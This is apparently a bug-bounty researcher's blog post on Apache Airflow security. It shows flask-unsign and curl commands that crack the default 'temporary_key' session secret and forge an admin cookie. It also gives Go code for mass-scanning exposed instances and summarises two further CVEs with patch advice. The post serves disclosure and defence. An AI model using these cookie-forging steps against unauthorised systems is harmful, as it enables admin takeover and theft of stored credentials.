Apache Airflow is a popular system for executing workflows, such as copying and transforming data between data sources. I first ran into an Airflow instance exposed to the internet on a bug bounty program during recon, and started investigating its security.

By its nature, it is designed to be connected to many internal systems, and it comes with a web-based interface to introspect it. The attack surface of the web is great to combine with interconnection to databases and other critical areas.

I'll talk about the public CVE I started with, how I automated it to find several critical issues in a bunch of bug bounty programs, and then some lower-severity CVEs I subsequently discovered in Airflow.

All of the issues I'll talk about have been fixed in the latest Airflow versions, but it is hard to understate how many ways to deploy Airflow will still deploy an outdated version! If your company runs Airflow internally, you should ensure you are on or above v1.10.15 or v2.0.2.

CVE-2020-17526

Stateless authentication and authorization with JWTs and other "tokens" have been the biggest boon to security researchers in quite a while. They are hard to implement securely, and have several very easy to find and critical impact vulnerabilities (weak signing keys, several types of algorithm confusion, etc).

In this case, Airflow's web interface uses Flask's stateless, signed cookies to store authentication data. This means that Airflow is reliant on the user_id attribute in the session cookie to determine if you are logged in. Normally, we cannot modify these attributes because the cookie is signed, which means we will break the seal by modifying the contents — unless we have the key!

Junghan Lee of Deliveryhero Korea discovered that Airflow included a default signing key of temporary_key, and it doesn't seem it was being changed by anything. Using the great flask-unsign tool, we can very easily browse to an Airflow instance's login page, capture the unauthenticated cookie, and test to see if it is vulnerable:

curl -I "http://randomairflowinstance.com/login" | grep cookie
set-cookie: session=<cookie>

% flask-unsign -u -c "<cookie>"
[*] Session decodes to: {'_fresh': True, '_id': '<id>', 'csrf_token': '<csrf>'}
[*] No wordlist selected, falling back to default wordlist..
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 41670 attempts
'temporary_key'

It's then trivial to take that same cookie and forge the user_id attribute, which will designate what user ID you want to login as. Since we are using stateless cookies, the Airflow instance has no idea we are modifying this attribute. In this example we'll try an ID of 1, which is typically an admin:

% flask-unsign -s --secret "temporary_key" -c "{'_fresh': True, '_id': '<id>', 'csrf_token': '<csrf>', 'user_id': '1'}"
<an admin cookie!>

# ...go set that value as your session cookie and you'll be logged in! Note that the cookie expires.

The Airflow admin UI, showing variables with sensitive keys in plaintext(!)

Once you are logged in, Airflow's web UI exposes many sensitive things, and is often an extremely critical issue.

You can view environment variables and their contents. Commonly, there are highly-permissioned keys for AWS, payment processors, databases, etc.

While these can be hidden from the web UI, many companies neglect to enable this. If you use Airflow internally, check this!

You may be able to execute "ad-hoc queries" against connected data sources, even if you cannot read their credentials directly. SQLi as a service!
You can view the logs and source code of workflows (called "DAGs"), which may also contain credentials.

Automating discovery

I initially exploited this CVE on a transportation company's bug bounty, and I was quickly awarded $4,500 for it as a critical issue. That is pretty good for a public CVE, and I was sure there are other instances, so I decided to wire up this bug to my bug bounty automation framework. Bug bounties are fun, but they carry significant risk of not being paid for your time. As a result, many researchers automate detecting vulnerabilities across all assets of every bug bounty program, and this trend is increasing rapidly.

While my framework for this isn't open-source at the moment, the workflow for doing this is straightforward on paper: discover (sub)domains of companies with bug bounties, find open ports on those hosts, and then send HTTP requests to them and see what happens. There is a lot of depth to each of these tasks, but you could start with a framework like Amass. My tooling currently tracks over 400,000 exposed ports across 1.1 million discovered domains.

To detect this issue, I defined a simple request for GET /api/v1/version. With Airflow v1, this throws a distinctive 404 page that we can flag as worthy of investigation (since most of these instances aren't updated). On Airflow v2, this will return the system's version if the new API is misconfigured to not require authentication. When either of these rules matches a host, I get a push notification on my phone and can quickly identify the host, IP address, and investigate to see if it merits a report.

&(ProcessorRequest{Path: "/api/v1/version"}): {
		{
			Handler:  processorAirflowStableApi, // Returns a Result if it looks like the Airflow v2 API.
			Name:     "airflow_stable",
			Interval: 10,
		},

		{
			Handler:  processorCheckAirflow404, // Returns a Result if it looks like the Airflow 404 page.
			Name:     "airflow_404",
			Interval: 10,
		},
},

[...]

func processorCheckAirflow404(res *Response, domain queries.PortVHost) (*models.Result, error) {
	// Ignore if it's not a 404 or if the body is empty.
	if res.Http.StatusCode != 404 || res.Body == "" {
		return nil, nil
	}

	// Ignore if it doesn't contain the distinctive 404 page.
	if !strings.Contains(res.Body, "Airflow 404 = lots of circles") {
		return nil, nil
	}

	[...]
}

I used to run flask-unsign on all cookies that looked like they could be vulnerable, but I had to move this out into an asynchronous task as, with my high rate of requests, it quickly consumed more CPU resources than the crawler could handle. I now store all response cookies in MariaDB and later process them at random, but the Airflow 404 page catches more of these instances than this slower process does.

If you use Project Discovery's vulnerability scanner Nuclei, they have also recently written several great rules for detecting Airflow and its various issues (albeit not this one specifically). They include several other Airflow vulnerabilities that I also wrote rules for.

In total, across HackerOne and Bugcrowd, I made over $13,000 from exploiting these Airflow instances. Most companies handled this issue extremely quickly, although several still expose these instances to the internet, meaning you too could find a different vulnerability and earn another P1 bounty.

Smarter companies quickly placed Airflow behind proxies such oauth2-proxy or Duo Network Gateway, which is a strong defense against authentication issues at the application level. I highly discourage exposing Airflow directly to the internet.

Further research

At this point, I was pretty interested in Airflow. I decided to set up my own local environment and hunt for additional issues. I started with a popular Docker image for Airflow, but I was dismayed to discover that it does not even support running an Airflow version unaffected by the public CVEs. Eventually, via source code auditing and poking at my now-very vulnerable Linode, I discovered two more lower-impact CVEs:

CVE-2021-26559 (medium severity): In Airflow v2.0.0, a new API was exposed that allows retrieving Airflow's configuration file. There is no RBAC enforced on this endpoint, which allows any authenticated user to retrieve the signing key we abused above, even when it's been changed, allowing privilege escalation to an administrator.

This is not very severe, unless you are one of the Airflow instances out there that implements Google OAuth incorrectly... I have discovered instances that allow signing in with any Google account, which might not get you many places if RBAC is enabled. This CVE would allow properly escalating that issue to an administrator.

CVE-2021-26697 (low severity): In Airflow v1, an API endpoint for the experimental API inadvertently had its authentication decorator removed in a refactor. This is a good advertisement for requiring a decorator to remove authentication, not to add it. This endpoint has several complex parameters and is not very useful, so it is unlikely it was exploited.

The Apache security team was very responsive and helped fix these issues quickly.

Conclusion

I hope this post encourages more research into Airflow security, as I think it would be valuable for the project and the internet. If you have any questions on Airflow or my automation, feel free to DM me on Twitter at @iangcarroll!

Exploiting outdated Apache Airflow instances in bug bounties

CVE-2020-17526

Automating discovery

Further research

Conclusion